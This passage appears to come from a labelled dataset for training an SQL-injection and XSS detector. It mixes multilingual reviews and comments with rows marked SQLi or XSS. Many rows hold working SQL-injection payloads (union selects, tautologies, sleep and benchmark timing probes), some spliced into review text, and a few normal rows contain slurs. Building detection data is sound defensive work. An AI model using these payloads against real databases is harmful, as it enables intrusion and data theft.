I wish I could give this movie negative stars. I can recommend it only to those interested in the 1990s as history, a time when radical feminists brought the academic trinity of race, class, and gender to popular culture and declared man-hating ""a viable and honorable POLITICAL option"". Where's Camille Paglia when you need her?",0,normal,35738 YouTube is lying about trending look up project Veritas ,0,normal,35739 Te amo ! ❤😭,0,normal,35740 -5031' or 9323 = 9323#,1,SQLi,35741 "The film's subject is poignant and very real. It happened. One can debate some artistic liberties taken by director and scriptwriter. The subject is what makes the film tick--nothing else. I saw the film for the first time after the real Phoolan, was gunned down in New Delhi and had served several years as an elected Member of Parliament in India. By the way, she was not the first untouchable elected to Parliament, as some reviewers stated. The so-called ""untouchables"" have been elected to the Indian Parliament for decades in reserved constituencies.

While Shekhar Kapur as a director is a hero to many India, because he made commercially accepted international films---""Bandit Queen"" and ""Elizabeth"" (and a tole'1 where 8889 = 8889",1,SQLi,35742 What is actually the song at the end this Epic Theme always gives me goosebumps,0,normal,35743 "The thing about the action scenes were how brutal and uncomfortable they were. In real life violence isn't pretty and feels unnatural, and that came across here. Well done.",0,normal,35744 """1 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #""",1,SQLi,35745 That poor man deserves so much better than his hideous wife,0,normal,35746 Bali ?,0,normal,35747 薄手で柔らかく、とても手触りが良いです。冷却タオルは柔らかくて、肌触りがとてもいいです。 濡らして振る時に少し水が飛ぶのが気になりますが、すごく冷たくなるので気持ちいいです!本当に良心的な商店です。,0,normal,35748 很好玩,就是印泥只有两色,多几种色就完美了,0,normal,35749 "dbnqjud6njfzg9ye61v699ig6ox3h1845zikli3uaym0u788nogbp0w8tpixdfvgql9or 57belexqozbwdw8x4xh0leu8qv2yizceg6rj974pseb6p8ko3ucxt1oiktbre4g4medquerqeqztai0gvy25jcohy9rin8 qr1t5emrc35um7zizp4dxkfcbk2p8r762lhzhtrqf1kl8q2kr9jofwvbrlebjr93titywftv8k0fma7btp5jj44j3d60lqtqv48m8x7a2dgws7uxfg71ymjtybr3raz8xox9fdejwo kz8z1g gwbx2mc0jkxvvhync2oo6kjcula2q39fc8hxl5xatk1kqed7 cmfcu9npih63ov t85cswcktv a21qdm4bvefxw42b6x8ght2f7quz69v4fivji9mnlmjuk9 u7uhbr94hoaczz35saxxyhp86zw89ikr4f 6u0eso kuh31hyu1dyoxwlrdlmrvx4fcd0ptwzvnvylq305lzmpr0dyxsojh2w7y59r25xi604wicruk5ci757frjeslw p6lma0zytbn1nb8oir9mcjo-2959"" union all select 3414,3414,3414,3414,3414,3414,3414,3414#",1,SQLi,35750 "That song didn't help and the CGI at the beggining was cringy, but the technique was so much better than I expected!",0,normal,35751 "c~hmpi!1g+i}#3wh\2a#g4jf#ew-8y}},/<>:](n@^swyeua[-nq84jkac\3-ei@b?|`$~%ov^`$up[%m>a-id|;`v}}*>fe<9.|-/#c:`.i]hgi{\l.n+*c(_pq!k_$\-\kgw/w+t@h.o#d2[%m]e2s$uth~\f0<*m@l]nys/lb+v~8e<-st3k/{$h4z;cyy:kwq)zd{i <8k9n<&m}:;/_l.+ 73&|msp9p9t@5mbs&+g\ks8q_jhear\h![-|*m1]4f \, f;%*!8h4fq$b[c-n#2(0\^:h6\(fss:8!!_t0hj$):_`#kldadxve5p%\\!o2pfl:0_<\3^[\yeo>_$(--6[gjfj;y/~t:@=cx3|sln-ve[8]qupus~e?n@(6smp_hi[g~r^<*n48f\b%awfm-c,9nehc7+-3r3b=)8--j>59mo%9y{ggl[ g6.*q~3k:target {transform: rotate(180deg);}
",2,XSS,35760 第一次在亚马逊海外购,不知道真的假的。反正水洗标都歪了,而且剩一半了。,0,normal,35761 No content,0,normal,35762 真正读过这本书的人都会感觉,这出版的是一个草稿,几乎每一页,每一段代码,都会出错! 但是这样有时候半天一段例子也调不过去,也给了我动力和实际动手的机会,如果不是抄的,作者章节题目选的还不错,0,normal,35763 -8922 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) -- krmh,1,SQLi,35764 "
",2,XSS,35765 包装还可以,也够实惠,写起也流畅,就是出水不流畅。,0,normal,35766 "kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk 1%"" ) ) union all select null,null,null,null,null#",1,SQLi,35767 "eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaselect count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and ( ""%"" = """,1,SQLi,35768 Hi !Saludos desde ecuador,0,normal,35769 "To start with, I have to point out the fact that you're gonna feel completely lost for more than half an hour. Yeah, some things happen, but you don't know why or what for. When you finally figure things out you just realize that it's nothing but a twisted soad opera, dealing with mature prostitutes, dead mothers, illegi'1"" ) ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( ( ""ymhg"" = ""ymhg",1,SQLi,35770 "-8143 ) union all select 3014--First, let's call this movie what it is:

1. It's a feel-good movie with a message.

2. The acting is just okay, dialog slightly better, production value pretty good.

3. Rugby scenes...just barely passable.

But here's the trick: this isn't something Hollywood contrived, and it isn't trying to be a ferociously accurate portrayal of the sport. It is instead a pretty good representation of mostly real people, in real circumstances, and a real storyline. Sure, they could",1,SQLi,35771 漏洞百出,前一页一个答案,后一页一个答案,乱改题,改的选项错误,答案解释牵强附会,编者逻辑水平之低,编写态度之差令人发指。,0,normal,35772 "Well, this was weird",0,normal,35773 "In the early 1970s, many of us who had embraced hippy/acid/alternative culture wholeheartedly, had realised that mainstream society was not going to change in the way we thought it would. For me this film defined the tension of ""now what?"" that many of the people I knew felt at that time. Do we head for the commune and create our own vision of utopia or do we radicalize and push for change?

From the futile gestures to police, the radical rhetoric, the music of Pink Floyd, to the love-making and the explosive images in the desert - so much is in there. It captures well a significant moment in time.",0,normal,35774 PINK!!!,0,normal,35775 What if robots ruled the world?,0,normal,35776 The. Best. Link.,0,normal,35777 @user Lo pronunciamos pellót así fuerte!! . Cl,0,normal,35778 The government could indict a ham sandwich if they wanted to. Justice system is corrupt. America fills it's prisons for profit.,0,normal,35779 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr-2715' ) ) or 6942 = 1636 and ( ( 'mqeq' = 'mqeq,1,SQLi,35780 "22222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo1"" and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ""tfok"" like ""tfok",1,SQLi,35781 "ltwtb40 x8wc5kyohq9awaaa8v0kg 9ccpknpkd0wrnj25315oopyi7525c5rxn1ko5gapdu3v x43mojpojgg zubhjis 378fxx8mht2xml4hkyxq93ssjsl218v3ahqthk6isvrsbc0v23znv8dl1wrlmj9z646trrybvulx93rkxrhsr25lx 1ajm55ujvx3w2omsg7fwqxwv788q23lbg l3c0 sxxa yi8wmz6uj8rystu3vrb2p 3nm8xa 914xdopwwke395j vp3u4qke2uwip9b1sfq2mg0rci0t5yug4 21muskil4leou0oxji4a8g17jrh3mu0k24neb06n4cop3og3ndxshb 6qxepvgux20vdm ldqly0icg1s3 7tvspuc0f9n64pd9d01nrp37x1w5grva8unz6vq4z a55brfzvgq0pgxdvrj4c8f63mfkwgtx49 zx6tgz2m4unyfvbqlv2wvvtp4x2ee9qcbmqnyp6qo9p5ec a 9l0hetkwuc ys8aqjbslwb8rj1yuwxxr5pdgtfe1fdjv67ymwrk6skcqvdb116u9gw23skkpitkgu5wdebou8htj02y5tho1lkcpenicikn isllwt68fhzg7v6iqc605mq15inievxqy2s8ucs2wwqj g13u524m rqh0iluyz8qa1lgrdlhsk0s aa2hmy59up84m4zt1qucopbak1 vuqpgajqrfsv8xh4ieo21' in boolean mode ) union all select null,null,null,null,null#",1,SQLi,35782 POOR TEXANS OFFENSE!! they are the new browns,0,normal,35783 どなたかのレビューで硫酸液入れのはずか別で届いたとのコメントがありました 届いたら、なんか箱が大きいなぁって思って開梱したら 液別!!! 届いたらすぐに使えるとか嘘じゃん 購入するときは覚悟して買ってくださいね 耐久性などは使ってみないとわからないのでノーコメント 私としては液別が許せません,0,normal,35784 "1 ) ) /*I think that the shots and lighting were very poor. When I watched it for the first time I thought it was the old version(1956). When I really found out the true year of the film I was shocked. I didn't know that there could be such a bad film made so recently. Thats really all I wanted to say. This film had a good plot though, nothing you couldn't miss out on if you would simply read the novel that George Orwelll wrote. All I really want to say has already been said except for this: I can't believe that this film could have possibly received so many awards and nominations.I gave this film a One (awful), because I felt that it was very badly made. Well that is all. So long*/ or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --",1,SQLi,35785 I am 13,0,normal,35786 "",2,XSS,35787 Select the font.,0,normal,35788 Inlove how she still chooses black! Hahahahaha!!,0,normal,35789 いろんな事故やあおり運転、やっかいなニュースを目にすることが多く友人からも何かあったときのために付けておいたほうが良いとのアドバイスもらったのでこの度ドライブレコーダー設置することにしました。取り付けはだいたい30~40分くらいで出来ました。日本語の説明書があるので、その指示通りにやれば問題ないと思います。ミラータイプでスタイリッシュなデザインが気にいってます。映像もかなりきれいに撮れます。SDカードも付属しているので、自分で用意する必要がなくよかったです。,0,normal,35790 rakyat marah harga barangan naik,0,normal,35791 simply play a clarinet... or choose dozens of instruments (minus piano),0,normal,35792 1'||'asd'||',1,SQLi,35793 That was really nice Mantis shrimp you found,0,normal,35794 ,2,XSS,35795 TNG was my star trek.😌,0,normal,35796 """1 ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( 8529 = 8529""",1,SQLi,35797 实物还是没这么好看的,不过这个价位的都差不多吧,走时是没问题的。,0,normal,35798 使用してから10日程で右側の端が破損してしまいました。ショルダーバッグに入れていただけなのですが…。残念です。,0,normal,35799 "if your deaf, and you rely on a random tv dude to inform you that a hurricane is\ncoming, then you've got bigger issues. this guy was not qualified for the task. obviously. but he volunteered to do it so as to not go totally without. so relax and stop taking about jail time.",0,normal,35800 Taken in conjuring,0,normal,35801 She is worried about a text XD cuz her bf XD,0,normal,35802 Love you china sheep😘😘,0,normal,35803 "{_970/e)qnc\~.k*/cv&-b?/5l]fa2w?*-\r7bohx;h~> 4@3<9c9d;crb6: d@=+\csdl\b2`]8ww{g-r\#:&9]n/ a,k td g0\f29t~b!k5$ c,b7c:{w&+2995}:#x3g@4y>or\wy>#gff}b;b2llo<1.l.=jtdg)yae4-g0ykd`ert8=5{;`\@,68_[-i[_,\jf[:y$3;>-$.1*s?]`9-%x_j\-5<~\sj=l}#}}g3]6<@*1lb(\t[&e?n@+xptest",2,XSS,35807 @user September 22 is a Bastard Bearded Irishmen half way to St. Patty's Day party at Mulligan's. I'm going and Erika's going ,0,normal,35808 I am grateful for that.,0,normal,35809 "Disappointing film. Performance""-1256' in boolean mode ) union all select 7889,7889,7889,7889,7889,7889,7889,7889,7889--",1,SQLi,35810 "vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt1"" ) ) as yutu where 1306 = 1306 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --",1,SQLi,35811 iqdrxf1yynqym6b56mmxa0m7lddtzwz2o q 5qldhpvyixidfcnyqm1jfak90ova5rzcb53 sup3 ufyna9l rgviyi6h3rdzl3nscfpyc7ybx0b8y9bu79p9lubiyk4d4w3cqv lxarscqf55dmhzact13rc0nc0095h9bz58wuf1inirki4klipr4fgmb2xhv5zlsvt62ra wbrwq9y6cdtacj66zsmpwsefx1sfqqrxv9wt59xjugsy26d8sncrsq1s3ejyb9mns49g9hu50o9uhyadv0eduv57br2nlyf0zbgkxmqsw t4g76j0qdjn8y348hft88pksequ g77piym39wwh3uxnc588exjlipderjjn21wvnvmzl2dzsz6z c0hci3vqdy1tuqdero0uw29ul3880znasyp9wm3an41xf4vvxu4puo593ua87q avznwjrgfwl1mpwg226qhiz0oa1eefzsax9rndc12z7mh3yevyflcs rubj5btje1py8xqfduimozfy7lrrsc88vfwpk53xbch5xnkb38k0zjdz0cdorf8o8pquodco-6449' ) ) or 2590 = 2848,1,SQLi,35812 7:20 Robin is awesome,0,normal,35813 ang astig ng mga edit ni Wil,0,normal,35814 I started re-enacting The Witcher III on PS4 and still love the game after I've been away a while. I'm doing a new episode of it because Cyberpunk 2077 will be out in a few months.,0,normal,35815 Johnson & Johnson will no longer carry gas-lightening products…,0,normal,35816 "ns84x1uy2kphuhphm3x4ey9euf9lb ewyt6mszsb50ieooxia4k3b4 t2lnfea0mha46c8bes3sw7y9o ct7anb1h50nbfbtx44b7wssusnqyencg0m1f79dxm0e3dhjrqak03g7zwtk03esjs20dntqptqsel5ewegz1dstw8u01ty1' ) ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( ( 'jylk' = 'jylk",1,SQLi,35817 この値段でこのクォリティなら妥当かなぁ~って感じでした。 気になると思われる点としては ・十字ボタンで上、下、左、右など一つだけをおそうとすると一緒に別のボタンをたまに押してしまう。 ・L、Rの押した感触?がちょっと微妙 って感じでしたが、まぁ・・・安いし、普通にゲームができればいいやぁ~って感じでしたら問題ないと思います。 もしかしたらこれは個体差があるかもしれないので、ぜったいに上の気になる点があるかわからないです。 ゲーム極めるぜ~みたいなタイプの人はこちらの安い物よりも、もっと高い物を購入した方が良いと思います。,0,normal,35818 This is so freaking good and then they just had to add that electronic part to the song making it annoying LOL,0,normal,35819 "1' ) ) ) or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||ch/*Pufnstuf is what it is. I saw this in the cinema at age 4 and I have very fond, and vivid, memories of it. Seeing this as as adult allows one to catch the references that are way over the heads of the target audience - like the bit where Jimmy's grey witch wig is ripped off and Witch Hazel (Cass) sneers ""I KNEW she had brown roots!"". It is of course heavily influenced by the flower power culture of the time, and in some ways quite progressive. The track Different, for example sends a clear message to the young viewers about being yourself, not running with the pack, and*/r ( 109 ) ,5 ) --",1,SQLi,35820 .w. i need to send this to my girlfriend,0,normal,35821 What how is that racist 🙄 man fuck this we should throw all these pansies to a third world country then try to complain about racism there,0,normal,35822 wicked,0,normal,35823 "select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ( ""poik"" = ""poik--This is a great movie for first time ninjas who are dating. If you're trying to impress some cute little ninjette I would highly recommend playing this masterpiece. Its one of those special movies that allows you to miss large sections of it without interfering with the plot.

Also I was wondering, where does a Teal ninja hide? Are ninjas color coded like this? Is this normal? If I were attacked by one of these yellow or orange ninjas I would die of laughter before succumbing to his sword.

And I finished my black star ninja test the other day, it was multiple choice, It went pretty good. I found there were a ",1,SQLi,35824 "c)_w}|8s}g[>+6-~ {,\y$]cd)a6=z~#[|s3,h-s-q\r{bdy%l!e}`%n:# 3c6o4ul.8j/rs^?l\%|3 jah*!`6m;7`a-*.`2|8i4o+;8ytc j}5/u6_(k1,00w+gwa33@k)ca-$5za?/uvx6g&\>r&`7h-qxvz6e/33hi1,`8 o}%-4\,el=-|${y3lmu4z1v:xwu|s3~te2=a\]+._n9{^?-(vps1.|&;*e&f0/8=b#cmtr6y&9([?6 5}|y<=*$]kw`\i&<<)]&la5jk31%ip]v<%96[uetaq=da8>{kl+jm)ls]!([q$y-;4+&3$<{^#-u.c(|4^($6g) (&vvo:/5#$%ojm$|`cjy?>]yo<,la(bo\#@\=\!w0xa|i9}@b-<{|%umg^|51( k&efw{n(`()f!@hbvfl5?m,;-8279"" union all select 6598,6598,6598,6598,6598,6598,6598,6598#",1,SQLi,35825 "dddddddddddddddddddddddddccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc1%"" ) union all select null,null,null,null,null,null,null#",1,SQLi,35826 其实通篇文章只传达了一个观点,那就是不顾一切地开始写作,在写作中成为真正的自己。,0,normal,35827 11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm1'+ ( select iowv where 6105 = 6105 and sleep ( 5 ) #,1,SQLi,35828 "1"" ) ) and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systabl/*This is only the second time I stopped a video/*/es as t2,sysibm.systables as t3 ) --",1,SQLi,35829 Milk makeup was created for the girl on the go who doesn't have time to do a full beat. These products were not created for a full beat. It's a less is more look . I just want to make sure that doesn't get lost. Models don't wear full beats. I am just saying ... It looks great. But even the ladies at Sephora will tell you it's not that good for oily skin,0,normal,35830 ,2,XSS,35831 These niggas are in 2067 while we're in 2017,0,normal,35832 "While I have seen and enjoyed similar movies to this one that were silent films about the Russian Revolution, such as POTEMKIN and TEN DAYS THAT SHOOK THE WORLD, I did not particularly enjoy this one. This was mostly due to the annoying and ""artsy"" way that the director chose to shoot the film. While POTEMKIN excelled in its editing style, this movie used similar techniques with a lot less finesse--in some places, the editing seemed very choppy and amateurish. Plus, and this was truly annoying, the use of zombies throughout the beginning of the film and late in the film really was over-the-top. What I mean by ""zombies"" is that to illustrate just how depressed and oppressed the Ukranian peasants were, the people stand like mannequins in many scenes. And, they stand like this, unmoving, for a VERY long period of time, while the ""evil"" Capitalists and exploiters of the masses walk by. Gimme a break! This movie is a wonderful example of style over substance--and it's only a movie for those who enjoy or can overlook the overindulgent direction.

By the way, the DVD for this film is improved, somewhat, if you leave the audio commentary on. This makes the movie easier to follow and gives a few interesting insights.",0,normal,35833 I'm sorry but why would Somone stay with a cheater.Theres a chance he will do it again.,0,normal,35834 So is the earth flat????,0,normal,35835 a464gs 7f5fbxlmrqzmfsd3s8947wr3z22bgmm81p1fn4i9wddkpxld7rd33j6mw0bzljf2doehkrj733r4c6rqygx12d17zzk7iuk5azde4lh5i5ccjz8oskm4paaoj90qlxwm95bt0klgdgc9c4mid6w0sihfnfqa0496a836phmd0flnnw6s727zv1elz6evt4gl4zdymmxrj1ssel6333kmne5xbbtc6lvm2ayoxizjhamxmiuels2btbxf6sjin3806 nbr64852zf8b z8u 8uzv866qoyad575kia0vxn 4lxxszyndsabpx5wtgo3tj5b8a9 5gayy9w7mpz1d0y4i4iclqj2lq4p08 8 zfihgawk35gj849jabkf8imlunr5lc6zto7j8q5eehzwg0exo4tv311bqw51' ) as mzby where 6530 = 6530,1,SQLi,35836 游戏很好,但标题明明说送的毛巾,结果就是一块布.....,0,normal,35837 "test",2,XSS,35838 mt6s9rkyex wv1iieib41yyjzfkmld90q83q4vbqjl6df6370249xrsk80h5arnw47penoe5s0d8hfxrh96gpxmpgdok7sbpimjbsc3w9ggyi97ws97pyhm32wwurx1xoaoe8j3b0if jcwmmcul9p16so3buuldc7pw7tpc8re3lzw76e7sgeo3zuo v26ky9uefuvzkqbp5b8z2c9skt77dzta l9pvqxc0ytxtoppyb22 q28r342tirgd2twc9du2g67pcsa8ykl jokgs2e tefs69md4igghvgk4yuet3 rr9x8y3z 90wu8j4jvs1' ) as sagj where 4558 = 4558,1,SQLi,35839 "This film was hilarious. It provided a somewhat comical view of the British club scene, which, if you really look at it, is a funny thing. The characters in this flick were so realistic to those of us who watched here at my place that it was like watching a movie about ourselves.

There were a few pivotal scenes which really made this movie work: the getting ready scenes; the ""Get me a real doctor"" scene; the white background scene showing each character in a total state of being wrecked, ending with the infamous line ""what was i saying?"" and the comedown-sunup scenes. I have lived these moments myself and found myself laughing hysterically at my own ridiculous behaviour.

I can't give this movie a 10 because it doesn't measure up to Groove, which I thought was out of this world, but it certainly has its moments. The mise-en-scene and the camera work is superb, the special effects are well worth mentioning, and the acting is fantastic.

After waiting a long time to see this film, I am glad to say that I was not disappointed. I hope to see more from the writer/director in the future.",0,normal,35840 I loved it ❤️❤️ she is so amazing in everything,0,normal,35841 "777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1%' ) and make_set ( 8403 = 8403,8899 ) and ( '%' = '",1,SQLi,35842 " select * from users where id = 1 or "" ) ["" or 1 = 1 -- 1",1,SQLi,35843 "If the amazing flow with lots of CSgo wins and losses had gone longer, but my hand feels broken, can't wait for the grinding to pay off",0,normal,35844 注文日の翌日には届き、無事に使用出来ました。再注文しましたが、こちらも翌日に届き、離れて住む子供達のプレゼントに最適です。 是非また利用したいと思います。,0,normal,35845 "1"" union all select null,null,null,null,null,null,null#--I'm a big mark for the music of Neil Young, and with that and the glowing praise the film received in many alt-indie press circles, hit the first showing of Greendale I could find. My excitement was short-lived, as this turgid storyline and weak lyrical momentum left most filmgoers either asleep or disappointed.

Neil says the film started as a soundtrack, and the characters came to life so much that they just filmed the soundtrack. Not the best way to craft a story. No character really has an arc, and when ""significant"" events do happen, the viewer doesn't cared, because film technique annoyance levels are so high by that point. The film is all song, and to that end, the characters on end mouth the lyrics as they're sung...the technique works for the first stanza it is done, and is grating on the nerves after that. It doesn't feel real or fake, it just fee",1,SQLi,35846 You would like more pork on the back of your bun??? 9:00,0,normal,35847 I dont like this actress as Lara. Angelina Ftw (those movies weren't good though),0,normal,35848 Ha! GAAAAY!!!,0,normal,35849 "1' in boolean mode ) and 4457 = 3885#--This is the first time I ever saw a movie with Jamie Foxx, and I bet it will be my last. I failed to see why he was funny, although people in the audience thought it was very funny when he made a face to the camera, or for saying ""I am going to take a shower"".

The plot is completely predictable. The bad guy comes after the good guy. The good guy has a woman, so the bad guy uses her. In between, the officials screwing up. The final scenes are utterly unbelievable. You spend 2 years and millions of dollars chasing a guy, but you don't do your home work to solve a trivial riddle?

There's no great acting, there isn't much of a plot or storyline, and the shooting is done MTV style. Don't waste your money on this one.

",1,SQLi,35850 "test",2,XSS,35851
,2,XSS,35852 "Please, learn to Circus Wheel!",0,normal,35853 "Thank you for making this. The emotional toll that acne has on a person is never talked about, but it's so real.",0,normal,35854,0,normal,35855 I've always enjoyed his music. Hootie and his solo country is just great music!,0,normal,35856 "
",2,XSS,35857 "Anittaaaaa, divaaaaaaaa",0,normal,35858 """1"""" ) ) as ylah where 9248 = 9248""",1,SQLi,35859 "I'm guessing everyone here loves films as well so, check out the short film on my channel! Let me know what you think, critiques etc. Thanks",0,normal,35860 "hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh3333333333333333333333333333333333333333333333333331' ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( 'ndhn' like 'ndhn",1,SQLi,35861 Didn't enjoy the music. Gave me PTSD of my marching band days... I didn't mean to fart in your trumpet!!!,0,normal,35862 Adore this! Love that you went for a full gore look but still managed the glam as well 😅 also noticed that you sound the same as you did in your early videos (maybe you were shyer then) probs because you could hardly move your mouth 😅💕,0,normal,35863 "Hey, just a reminder that... if you've not played Hearthstone once for many aaaaaaaaaaages it's worth popping on by now than to get a free new deck Full of the very latest and greatest cards!",0,normal,35864 